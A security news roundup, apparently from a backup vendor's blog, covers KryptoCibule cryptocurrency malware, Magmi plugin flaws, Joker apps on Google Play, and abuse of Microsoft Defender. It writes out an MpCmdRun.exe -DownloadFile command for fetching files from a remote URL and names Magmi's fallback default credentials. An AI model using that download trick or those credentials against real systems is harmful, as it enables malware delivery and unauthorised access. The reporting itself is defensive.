KryptoCibule – triple threat / Magento flaws / Jocker is back

Welcome to the next episode of the Xopero Security Center! KryptoCibule is a new, 3 in 1threat for cryptocurrency owners! It has managed to stay under the radar for almost two years! In the first article of our IT news review, we take a closer look at this malware’s evolution. Ready for more?

New KryptoCibule Windows malware – a triple threat for cryptocurrency users

Threat researchers at ESET discovered a new malware family that is fully focused on getting as much cryptocurrency as possible. Dubbed KryptoCibule is “a triple threat”. It uses a victim’s resources to mine virtual coins. Tries to hijack transactions by replacing the wallet address in the clipboard, and exfiltrates cryptocurrency-related files.

KryptoCibule has managed to stay under the radar for almost two years. And with each new version extending its functionality, as shown in the below image. 

Source: ESET

Researchers note that KryptoCibule relies heavily on the Tor network to communicate with its command and control (C2) servers.

It spreads via malicious torrents in archives pretending to be installers for pirated versions of popular software and games. When launching the executable, malware installation starts in the background and the expected routine for the cracked product runs in the foreground.

This drill allowed the malware to avoid attention for so long. Also relevant might be a fact that it seems to target users in the Czech Republic and Slovakia. More than 85% of ESET’s detections are from these countries.

The latest versions of the KryptoCibule employ XMRig, an open source program designed to mine Monero using the device’s CPU. As well as kawpowminer, another open source program that mines Ethereum using the GPU. The latter is only used if a dedicated GPU is found on the host, and both programs are set up to connect to an attacker-controlled mining server over the Tor proxy.

Source: ESET

Users should remain vigilant, and the simplest way to avoid a threat like KryptoCibule is to not install pirated software. 

Sources: 1 | 2 | 3

MAGMI Magento plugin flaws allow remote code execution on a vulnerable site

Researchers at Tenable have disclosed two flaws that could enable remote code execution attacks on the Magento Mass Import (Magmi) plugin. It is an open-source database client that imports data into Magento. A patch has only been published for one of them (CVE-2020-5777), in Magmi version 0.7.24 on Sunday, 30th of August.

It is hard to say how many Magento sites are vulnerable. However, researchers were able to identify at least 1,500 websites indexed through search engines that use the Magmi plugin. But probably there are more…

Researchers on Tuesday also released proof-of-concept (PoC) exploit code on GitHub for both of the flaws.

The unpatched flaw, CVE-2020-5776 is a cross-site request forgery (CSRF) vulnerability affecting Magmi up to version 0.7.24. An attacker could exploit it to perform a CSRF attack. In this specific attack, threat actors could trick a Magento Administrator into clicking on a link while they are authenticated to Magmi. The attacker could then hijack the administrator’s sessions, allowing them to execute arbitrary code on the server where Magmi is hosted, researchers said.

The second, now patched flaw, CVE-2020-5777 is an authentication bypass flaw in Magmi for Magento version 0.7.23 and below. 

Magmi’s authentication process uses HTTP Basic authentication and checks the username and password against the Magento database’s admin_user table. However, if the connection to the Magento database fails, Magmi will accept default credentials, which are magmi:magmi.

“As a consequence, an attacker could force the database connection to fail due to a database denial of service (DB-DoS) attack, then authenticate to Magmi using the default credentials,” said researchers. “The impact of this attack is remote code execution (RCE) on the server where Magmi is hosted.”

How to reduce the risk in the meantime? It is recommended to disable or uninstall the plugin until the update. It is better to refrain from active web browsing while authenticated to Magmi.


Microsoft Defender can ironically be used to download malware

In a recent Microsoft Defender update, the command-line MpCmdRun.exe tool has been updated to… download malicious files from a remote location.

With this new feature, Microsoft Defender is now part of the long list of Windows programs that can be abused by local attackers.

Discovered by security researcher Mohammad Askar, a recent update to Microsoft Defender’s command-line tool now includes a new -DownloadFile command-line argument.

This directive allows a local user to use the Microsoft Antimalware Service Command Line Utility (MpCmdRun.exe) to download a file from a remote location using the following command:

MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]

The good news is that Microsoft Defender will detect malicious files downloaded with MpCmdRun.exe, but it is unknown if other AV software will allow this program to bypass their detections.

With this discovery, administrators and blue teamers now have an additional Windows executable that they need to monitor so that it is not used against them.


Xopero Backup Solution - Protect data like a Pro and don't let a disaster stop your business

Joker spyware plagues more Google Play apps

Google has deleted six apps from its Google Play marketplace that were infecting users with the Joker malware (a.k.a. Bread). 

Together, the apps account for nearly 200,000 installs… and they are still installed on the devices. Users are urged to immediately delete the applications.

The apps found with malware are: Convenient Scanner 2 (100,000 installs), Separate Doc Scanner (50,000 installs), Safety AppLock (10,000 installs), Push Message-Texting & SMS (10,000 installs), Emoji Wallpaper (10,000 installs) and Fingertip GameBox (1,000).  

Why so serious? Joker is a billing-fraud family of malware (which researchers categorize as “fleeceware”) that emerged in 2017. However, it began to ramp up in 2019. 

It advertises itself as a legitimate app. But once installed, simulates clicks and intercepts SMS messages to subscribe victims to unwanted, paid premium services (unbeknownst to them). 

Google has removed over 1,700 apps containing Joker malware from the Play Store since 2017, but the malware keeps re-emerging.

Users need to leverage not only computer protection (antivirus, backup software) but also mobile security. Especially in a time of remote work. 


Do you have thirst for knowledge? There are ten more cybersecurity stories below

1. Evilnum hackers targeting financial firms with a new Python-based RAT (The Hacker News)
2. Norway‘s Parliament, Stortinget, discloses a security breach (Infosecurity)
3. Epic Fail: Emotet malware uses fake ‘Windows 10 Mobile’ attachments (Bleeping Computer)
4. Security flaw allows bypassing PIN verification on Visa contactless payments (We Live Security)
5. Google removes Android app that was used to spy on Belarusian protesters (ZDNet)
6. New Web-Based Credit Card Stealer Uses Telegram Messenger to Exfiltrate Data (The Hacker News)
7. Cisco fixes critical code execution bug in Jabber for Windows (Bleeping Computer)
8. Phishing scam uses Sharepoint and One Note to go after passwords (Naked Security)
9. AlphaBay dark web marketplace moderator gets 11 years in prison (Bleeping Computer)
10. Tor launches membership program to secure finance, boost integration (ZDNet)